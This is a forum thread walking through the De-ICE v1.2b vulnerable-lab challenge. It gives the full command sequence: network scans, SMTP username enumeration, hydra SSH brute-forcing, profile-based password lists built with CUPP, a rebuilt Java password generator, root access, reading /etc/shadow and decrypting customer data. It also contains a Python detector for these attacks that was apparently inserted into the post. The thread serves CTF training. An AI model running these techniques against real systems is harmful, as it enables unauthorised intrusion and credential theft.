
Thread: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

  1. #1
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Links
    Watch video on-line: http://blip.tv/g0tmi1k/de-ice-v1-2b-1-120-5443965
    Download video: http://www.mediafire.com/?8gajaiu58f7rccd

    Brief Overview
    The "vulnerable-by-design" series De-ICE has released another challenge. However, it's in two different parts, which makes the naming more confusing! This is De-ICE level 1, disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD, which was released under the De-ICE name. This is it. To date, all of Heorot.net's releases (in date order) are as follows:



    Method

    • Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
    • Scan network for the host (nmap)
    • Port scanned host (unicornscan)
    • Enumerated services running on the open ports (nmap)
    • Enumerated possible username(s) (Netcat)
    • Brute forced login details (Hydra)
    • Profiled other users (CUPP)
    • Escalated privilege by re-creating custom encryption program (Java)
    • Found the "flag" (a database file)


    What do I need?



    Walkthrough
    A quick "ping" scan with nmap reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan, as well as enumerating which services are running, by using nmap. Unicornscan is quicker at port scanning (especially UDP scanning). However, nmap has the upside of being able to do more "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using the "-A" option). The attacker also increases the scan speed (with "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

    The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that the web site is "under maintenance", with methods of contact: a telephone number and an email address.

    The port scan revealed that there was an SMTP service running, and the attacker decided to attempt to use the email address to identify possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name, it will return whether the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find the valid login, csadmin.

    The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password; however, it would have taken a lot longer to reach it.) The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist), the attacker found the valid password, 'rocker'.

    Upon logging into the system remotely, the attacker finds out whether there are any other valid users on the system (the result is 4). The attacker then continues by browsing the user's (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user, which is also commonly used as their password.

    After building up the profile for each user, the attacker then generates possible passwords from this information by using CUPP (Common User Passwords Profiler). The attacker enters the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor-made for that user. This quickly found the user's (sdadmin) password (his child's name and year of birth: donovin1998).

    The attacker logs in with the new credentials, views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feelings towards them!). The whole process is then repeated for the new user (dbadmin), who also used personal information for his password (a nickname with a few numbers at the end: databaser60).

    When the attacker logs in once again, they soon find the first part of an email which has been in every user account so far. The contents of the email have been "corrupted"; however, the header of the message is still intact. The subject of the message implies its purpose: "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which reveals the beginning of the possible source code.

    The attacker then builds up the code from the three parts found so far. It is written in Java, and its function is the generation function for the new password policy. There are comments left in the code saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds to the code (input & conversion functions).

    Once the program is complete, the attacker runs it to generate the passwords for the sysadmin and root accounts. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.

    The attacker now has access to the complete system...

    Game over

    ...and chooses to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file and, by trying all the encryption algorithms with the super user's password, is able to decrypt the file and view the content in plain text, revealing customers' details such as names, email addresses, usernames, passwords and more!

    Game over...again
    Last edited by g0tmi1k; 08-12-2011 at 11:22 AM.
    Have you...g0tmi1k?
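The walkthrough above leans on two actions that leave a clear trail on the target: the RCPT TO probing used to find the csadmin account, and the repeated hydra runs against SSH. The script below is an added example, not code from g0tmi1k's post or from the De-ICE image. It parses constructed sshd "Failed password" lines (OpenSSH's real syslog wording) and constructed sendmail-style "User unknown" recipient rejections, groups them by source address and raises an alert when one source exceeds a threshold inside a time window. The hostnames, process IDs, thresholds, the rejection-line layout and the year assumed for the year-less syslog timestamps are all assumptions made for the example.

```python
"""Flag SSH password guessing and SMTP recipient enumeration from log lines.

Added example: every line in SAMPLE_LOG is constructed for this demo and did
not come from the challenge VM. The sshd format follows OpenSSH; the mail
rejection format is an assumed sendmail-style layout.
"""
import re
from collections import defaultdict
from datetime import datetime

SYSLOG_TS = r"(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d)"

# OpenSSH: "Failed password for [invalid user ]NAME from IP port N ssh2"
SSH_FAIL_RE = re.compile(
    SYSLOG_TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")

# Assumed sendmail-style rejection of an unknown local recipient
SMTP_REJECT_RE = re.compile(
    SYSLOG_TS + r" \S+ \S+\[\d+\]: .*relay=\[(?P<ip>\d+\.\d+\.\d+\.\d+)\], "
    r"reject=550 5\.1\.1 <(?P<user>[^>]+)>\.\.\. User unknown")

SAMPLE_LOG = """\
Dec 22 16:41:10 mailhost sendmail[10211]: oBMGfAQ4010211: ruleset=check_rcpt, arg1=<customerserviceadmin@nosecbank.com>, relay=[192.168.1.192], reject=550 5.1.1 <customerserviceadmin@nosecbank.com>... User unknown
Dec 22 16:41:18 mailhost sendmail[10212]: oBMGfIQ5010212: ruleset=check_rcpt, arg1=<customerservice@nosecbank.com>, relay=[192.168.1.192], reject=550 5.1.1 <customerservice@nosecbank.com>... User unknown
Dec 22 16:41:27 mailhost sendmail[10213]: oBMGfRQ6010213: ruleset=check_rcpt, arg1=<cservice@nosecbank.com>, relay=[192.168.1.192], reject=550 5.1.1 <cservice@nosecbank.com>... User unknown
Dec 22 16:41:35 mailhost sendmail[10214]: oBMGfZQ7010214: ruleset=check_rcpt, arg1=<serviceadmin@nosecbank.com>, relay=[192.168.1.192], reject=550 5.1.1 <serviceadmin@nosecbank.com>... User unknown
Dec 22 16:41:44 mailhost sendmail[10215]: oBMGfiQ8010215: ruleset=check_rcpt, arg1=<custadmin@nosecbank.com>, relay=[192.168.1.192], reject=550 5.1.1 <custadmin@nosecbank.com>... User unknown
Dec 22 16:41:52 mailhost sendmail[10216]: oBMGfqQ9010216: from=<someone@slax.example.net>, size=0, class=0, nrcpts=1, relay=[192.168.1.192]
Dec 22 16:45:01 nosecbank sshd[2101]: Failed password for csadmin from 192.168.1.192 port 40001 ssh2
Dec 22 16:45:02 nosecbank sshd[2102]: Failed password for csadmin from 192.168.1.192 port 40002 ssh2
Dec 22 16:45:03 nosecbank sshd[2103]: Failed password for csadmin from 192.168.1.192 port 40003 ssh2
Dec 22 16:45:04 nosecbank sshd[2104]: Failed password for csadmin from 192.168.1.192 port 40004 ssh2
Dec 22 16:45:05 nosecbank sshd[2105]: Failed password for csadmin from 192.168.1.192 port 40005 ssh2
Dec 22 16:45:06 nosecbank sshd[2106]: Failed password for csadmin from 192.168.1.192 port 40006 ssh2
Dec 22 16:45:07 nosecbank sshd[2107]: Accepted password for csadmin from 192.168.1.192 port 40007 ssh2
Dec 22 16:50:00 nosecbank sshd[2150]: Failed password for sysadmin from 192.168.1.50 port 51000 ssh2
"""


def parse_ts(text, year=2010):
    """Syslog stamps carry no year; the year is an assumption used for ordering only."""
    return datetime.strptime(f"{year} {' '.join(text.split())}", "%Y %b %d %H:%M:%S")


def parse_events(lines):
    """Yield (kind, source_ip, timestamp, target_name) for each matching line."""
    events = []
    for line in lines:
        for kind, rx in (("ssh-bruteforce", SSH_FAIL_RE), ("smtp-enum", SMTP_REJECT_RE)):
            m = rx.match(line)
            if m:
                events.append((kind, m["ip"], parse_ts(m["ts"]), m["user"]))
                break
    return events


def detect(lines, threshold=5, window_seconds=60):
    """One alert per (kind, source) whose failures reach `threshold` inside
    any `window_seconds` span. A single mistyped password never trips it."""
    by_source = defaultdict(list)
    for kind, ip, ts, user in parse_events(lines):
        by_source[(kind, ip)].append((ts, user))

    alerts = []
    for (kind, ip), evs in by_source.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans <= window_seconds
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "kind": kind,
                    "source": ip,
                    "attempts": len(evs),
                    "targets": sorted({u for _, u in evs}),
                    "first": evs[0][0].strftime("%b %d %H:%M:%S"),
                    "last": evs[-1][0].strftime("%b %d %H:%M:%S"),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run on the constructed sample, the SMTP probing and the six-attempt SSH burst from 192.168.1.192 each produce an alert, while the lone failure from 192.168.1.50 does not. Tuning `threshold` and `window_seconds` against your own auth.log volume is the main judgement call; the recipient-enumeration rule is also a reminder to make the mail server answer RCPT TO identically for known and unknown local users.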

  2. #2
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Commands
    Code:
    ifconfig eth0
    ifconfig eth0 192.168.1.192
    ifconfig eth0
    nmap 192.168.1.* -n -sn -sP
    us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535
    nmap -p 1-65535 -T4 -A -v 192.168.1.20
    firefox 192.168.1.20    # customerserviceadmin@nosecbank.com
    nc -v 192.168.1.20 25
    HELO attacker
    VRFY customerserviceadmin
    mail from: attacker@slax.example.net
    rcpt to: customerserviceadmin
    rcpt to: csadmin
    quit
    wc -l /pentest/passwords/wordlists/darkc0de.lst
    find / -name password.lst
    wc -l /opt/framework3/msf3/data/john/wordlists/password.lst
    hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output
    ssh csadmin@192.168.1.20   # rocker
    id
    cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)
    exit
    cd /pentest/passwords/cupp/
    python cupp.py -i   # Paul, Donovin, 22121998, nosecbank
    hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
    ssh sdadmin@192.168.1.20   # donovin1998
    id
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less    # dbadmin (Fred, databaser)
    exit
    python cupp.py -i   # Fred, databaser, nosecbank
    hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output
    ssh dbadmin@192.168.1.20   # databaser60
    id
    pwd
    ls -lah
    cd mailserv_download/
    ls -lah
    cat * | less   # sysadmin, New Custom Encryption for Passwords
    umask 002
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' > /tmp/output
    su csadmin   # rocker
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output
    su sdadmin   # donovin1998
    strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output
    cat /tmp/output | sort -g
    cat /tmp/output | sort -g | cut -f2-
    exit
    exit
    exit
    geany deice.java
    less deice.java
    javac deice.java
    java deice    # sysadmin - 531/{{tor/rv/A
    java deice    # root - 31/Fwxw+2
    ssh sysadmin@192.168.1.20   # 7531/{{tor/rv/A
    id
    su -    # 31/Fwxw+2
    id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/
    pwd
    exit
    pwd
    ls
    cat Note_to_self
    ls -lAhR /home
    cd /home/ftp/incoming/
    ls -l
    openssl -h
    openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"
    su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"'   # 31/Fwxw+2
    ls -l
    cat useracc_update.csv
    deice.java
    Code:
    import java.io.*;
    //import java.util.Arrays;
    
    public class deice
    {
     public static void main(String[] args)
     {
        try
        {
           System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");
    
           BufferedReader in=new BufferedReader(new InputStreamReader(System.in));
           System.out.print("[?] Username: ");
           String input=in.readLine();
    
           int[] output=processLoop(input);
           //System.out.println("[+] Output: "+Arrays.toString(output));
    
           String outputASCII="";
           for(int i=0;i<output.length;i++) outputASCII+=(char) output[i];
           System.out.println("[>] Password: "+outputASCII);
    
        }
        catch(IOException e)
        {
           System.out.println("[-] IO Error!");
        }
     }
    
     /*input is username of account*/
     public static int[] processLoop(String input){
        int strL=input.length();
        int lChar=(int)input.charAt(strL-1);
        int fChar=(int)input.charAt(0);
        int[] encArr=new int[strL+2];
        encArr[0]=(int)lChar;
    
        for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);
    
        encArr[encArr.length-1]=(int)fChar;
        encArr=backLoop(encArr);
        encArr=loopBack(encArr);
        encArr=loopProcess(encArr);
        int j=encArr.length-1;
    
        for(int i=0;i<encArr.length;i++){
           if(i==j) break;
           int t=encArr[i];
           encArr[i]=encArr[j];
           encArr[j]=t;
           j--;
        }
        return encArr;
     }
    
     /*Note the pseudocode will be implemented with the
     root account and my account, we still need to implement it with the csadmin, sdadmin,
     and dbadmin accounts though*/
     public static int[] backLoop(int[] input){
        int ref=input.length;
        int a=input[1];
        int b=input[ref-1];
        int ch=(a+b)/2;
    
        for(int i=0;i<ref;i++){
           if(i%2==0) input[i]=(input[i]%ch)+(ref+i);
           else input[i]=(input[i]+ref+i);
        }
        return input;
     }
    
     public static int[] loopBack(int[] input){
        int ref=input.length/2;
        int[] encNew=new int[input.length+ref];
        int ch=0;
    
        for(int i=(ref/2);i<input.length;i++){
           encNew[i]=input[ch];
           ch++;
        }
    
        for(int i=0;i<encNew.length;i++){
           if(encNew[i]<=33) encNew[i]=33+(++ref*2);
           else if(encNew[i]>=126) encNew[i]=126-(--ref*2);
           else{
              if(i%2==0) encNew[i]-=(i%3);
              else encNew[i]+=(i%2);
           }
        }
        return encNew;
     }
    
     public static int[] loopProcess(int[] input){
        for(int i=0;i<input.length;i++){
           if(input[i]==40||input[i]==41) input[i]+=input.length;
           else if(input[i]==45) input[i]+=20+i;
        }
        return input;
     }
    }
    Notes

    • De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
    • The wordlist used (part of the Metasploit framework) to brute force csadmin might have been updated since; you may have to use another wordlist.
    • I made a couple of mistakes in the video (for example: nosec instead of nosecbank); it's worth checking the commands subsection!

    Song: Electronic Sympathies - Shanti & Punk (Radio Edit) - Ferry Corsten
    Video length: 10:48
    Capture length: 40:01
    Blog Post: g0tmi1k: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}
    Forum Post: http://forums.heorot.net/viewtopic.php?f=16&t=507 & http://www.backtrack-linux.org/forum...tml#post204395



    ~g0tmi1k
    Last edited by g0tmi1k; 08-09-2011 at 09:18 AM.
    Have you...g0tmi1k?

  3. #3
    Just burned his ISO
    Join Date
    May 2011
    Posts
    7

    Re: [Video] De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

    Fantastic as ever milkman
